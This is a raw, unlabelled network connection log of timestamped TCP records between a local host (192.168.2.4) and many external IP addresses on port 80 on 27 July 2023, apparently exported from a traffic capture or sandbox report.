                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.693890095 CEST80499433.140.13.188192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.693922997 CEST80499433.140.13.188192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.694116116 CEST4994380192.168.2.43.140.13.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.713388920 CEST4994380192.168.2.43.140.13.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.758513927 CEST8049814170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.758728981 CEST4981480192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.806761026 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.806801081 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.806828022 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.806849003 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.806870937 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.806890011 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.806916952 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.806936979 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.806946993 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.806958914 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.806979895 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.806999922 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.806999922 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.807027102 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.807034969 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.807049990 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.807054043 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.807070971 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.807081938 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.807090998 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.807101011 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.807111979 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.807121038 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.807136059 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.807157040 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.844819069 CEST4994580192.168.2.413.224.103.99
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.852844954 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.852880955 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.852900028 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.852919102 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.853153944 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.853209019 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.855257988 CEST804994513.224.103.99192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.855448008 CEST4994580192.168.2.413.224.103.99
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.856040001 CEST4994580192.168.2.413.224.103.99
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.862668037 CEST80499433.140.13.188192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.866378069 CEST804994513.224.103.99192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.866704941 CEST804994513.224.103.99192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.866867065 CEST4994580192.168.2.413.224.103.99
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.897443056 CEST4994580192.168.2.413.224.103.99
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.908006907 CEST804994513.224.103.99192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.908420086 CEST804994513.224.103.99192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.908584118 CEST4994580192.168.2.413.224.103.99
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923460960 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923502922 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923525095 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923544884 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923578024 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923604965 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923633099 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923650026 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923660994 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923681974 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923695087 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923702002 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923722982 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923726082 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923747063 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923753023 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923774958 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923774958 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923800945 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923800945 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923820972 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923826933 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923846960 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923846960 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923866034 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923866987 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923887968 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923894882 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923908949 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923916101 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923933983 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923940897 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923953056 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923970938 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923981905 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.923991919 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924012899 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924014091 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924030066 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924034119 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924055099 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924056053 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924071074 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924079895 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924098015 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924102068 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924118996 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924139977 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924182892 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924206018 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924231052 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924237013 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924256086 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924261093 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924273014 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924298048 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924401999 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.924449921 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.969660044 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.969712019 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.969732046 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.969752073 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.969772100 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.969791889 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.969810009 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.969829082 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.969876051 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.969938993 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.017190933 CEST804983596.127.180.42192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.017302990 CEST4983580192.168.2.496.127.180.42
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040450096 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040499926 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040527105 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040554047 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040575027 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040596962 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040621996 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040644884 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040663958 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040683031 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040702105 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040720940 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040740013 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040760040 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040751934 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040780067 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040797949 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040832043 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040832043 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.040851116 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.059942007 CEST4994680192.168.2.4198.100.146.220
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.135175943 CEST8049928217.19.237.54192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.135253906 CEST4992880192.168.2.4217.19.237.54
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.169819117 CEST4989780192.168.2.4193.166.255.171
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.444446087 CEST4994780192.168.2.4157.112.176.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.687282085 CEST80499293.65.101.129192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.687417030 CEST4992980192.168.2.43.65.101.129
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.710014105 CEST8049947157.112.176.4192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.710170031 CEST4994780192.168.2.4157.112.176.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.710735083 CEST4994780192.168.2.4157.112.176.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.976181984 CEST8049947157.112.176.4192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.031888962 CEST8049935188.166.152.188192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.032089949 CEST4993580192.168.2.4188.166.152.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.035902977 CEST8049947157.112.176.4192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.036065102 CEST4994780192.168.2.4157.112.176.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.044919968 CEST4990580192.168.2.4210.140.73.39
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.155280113 CEST4994880192.168.2.4173.254.28.29
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.333925962 CEST8049948173.254.28.29192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.334055901 CEST4994880192.168.2.4173.254.28.29
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.334487915 CEST4994880192.168.2.4173.254.28.29
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.516758919 CEST8049948173.254.28.29192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.523051977 CEST8049948173.254.28.29192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.523145914 CEST4994880192.168.2.4173.254.28.29
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.548398018 CEST4994880192.168.2.4173.254.28.29
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.740475893 CEST8049948173.254.28.29192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.740576982 CEST4994880192.168.2.4173.254.28.29
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.763700008 CEST4991180192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.935904980 CEST4994980192.168.2.4157.112.182.239
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.951159000 CEST4991480192.168.2.496.91.204.114
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.174340010 CEST8049896202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.174412012 CEST4989680192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.201232910 CEST4991580192.168.2.496.127.180.42
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.202927113 CEST8049949157.112.182.239192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.203083038 CEST4994980192.168.2.4157.112.182.239
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.203725100 CEST4994980192.168.2.4157.112.182.239
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.451203108 CEST4994480192.168.2.496.91.204.114
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.470468998 CEST8049949157.112.182.239192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.471863031 CEST8049949157.112.182.239192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.471899033 CEST8049949157.112.182.239192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.471924067 CEST8049949157.112.182.239192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.471966028 CEST4994980192.168.2.4157.112.182.239
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.472042084 CEST4994980192.168.2.4157.112.182.239
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.472042084 CEST4994980192.168.2.4157.112.182.239
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.609630108 CEST8049900162.43.120.128192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.609796047 CEST4990080192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.925061941 CEST8049942104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.925179005 CEST4994280192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.975126982 CEST8049938208.109.214.162192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:15.975657940 CEST4993880192.168.2.4208.109.214.162
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.060679913 CEST4994680192.168.2.4198.100.146.220
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.196445942 CEST4969380192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.215279102 CEST8049693192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.215405941 CEST4969380192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.234668970 CEST4995180192.168.2.418.165.183.19
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.238867044 CEST4995080192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.245518923 CEST804995118.165.183.19192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.248719931 CEST4995180192.168.2.418.165.183.19
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.249429941 CEST4995180192.168.2.418.165.183.19
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.260430098 CEST8049950192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.260584116 CEST4995080192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.262283087 CEST4969480192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.265736103 CEST4995080192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.292687893 CEST4969680192.168.2.4172.67.208.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.311991930 CEST4995280192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.319632053 CEST4969280192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.323451042 CEST4995380192.168.2.4172.67.208.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.334547043 CEST4995480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.334758997 CEST4969780192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.336437941 CEST4995580192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.337852955 CEST4995680192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.339728117 CEST8049953172.67.208.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.340502977 CEST4995380192.168.2.4172.67.208.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.350503922 CEST4969880192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.350652933 CEST4995380192.168.2.4172.67.208.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.360805035 CEST4995780192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.363037109 CEST4969180192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.364764929 CEST4995880192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.366858959 CEST8049953172.67.208.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.367238998 CEST4995980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.378443956 CEST8049953172.67.208.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.378554106 CEST4995380192.168.2.4172.67.208.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.383486032 CEST804969880.93.82.33192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.482584953 CEST4995180192.168.2.418.165.183.19
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.486257076 CEST80499553.130.204.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.489751101 CEST4995580192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.494383097 CEST4995580192.168.2.43.130.204.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.495357037 CEST804995118.165.183.19192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.495414972 CEST804995118.165.183.19192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.498194933 CEST4995080192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.498495102 CEST4995180192.168.2.418.165.183.19
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.511915922 CEST4970180192.168.2.434.149.87.45
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.512787104 CEST4996080192.168.2.434.149.87.45
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.519659042 CEST8049950192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.519891024 CEST8049950192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.519968987 CEST4995080192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.526303053 CEST804970134.149.87.45192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.527673006 CEST4970180192.168.2.434.149.87.45
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.527867079 CEST4995180192.168.2.418.165.183.19
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.535542011 CEST804996034.149.87.45192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.535679102 CEST4996080192.168.2.434.149.87.45
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.538716078 CEST804995118.165.183.19192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.539634943 CEST4996080192.168.2.434.149.87.45
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.539653063 CEST4995180192.168.2.418.165.183.19
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.541716099 CEST4995080192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.560713053 CEST4969480192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.562318087 CEST804996034.149.87.45192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.563304901 CEST8049950192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.563419104 CEST4995080192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.577828884 CEST8049694188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.577977896 CEST4969480192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.591027021 CEST804996034.149.87.45192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.591114044 CEST4996080192.168.2.434.149.87.45
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.600794077 CEST804995459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.600925922 CEST4995480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.607590914 CEST4969680192.168.2.4172.67.208.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.616971970 CEST804990693.187.206.66192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.618388891 CEST4990680192.168.2.493.187.206.66
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.624169111 CEST8049696172.67.208.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.624290943 CEST4969680192.168.2.4172.67.208.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.625257969 CEST8049959206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.625401974 CEST4995980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.638808012 CEST4969780192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.639147043 CEST8049691118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.639255047 CEST4969180192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.642545938 CEST80499553.130.204.160192.168.2.4
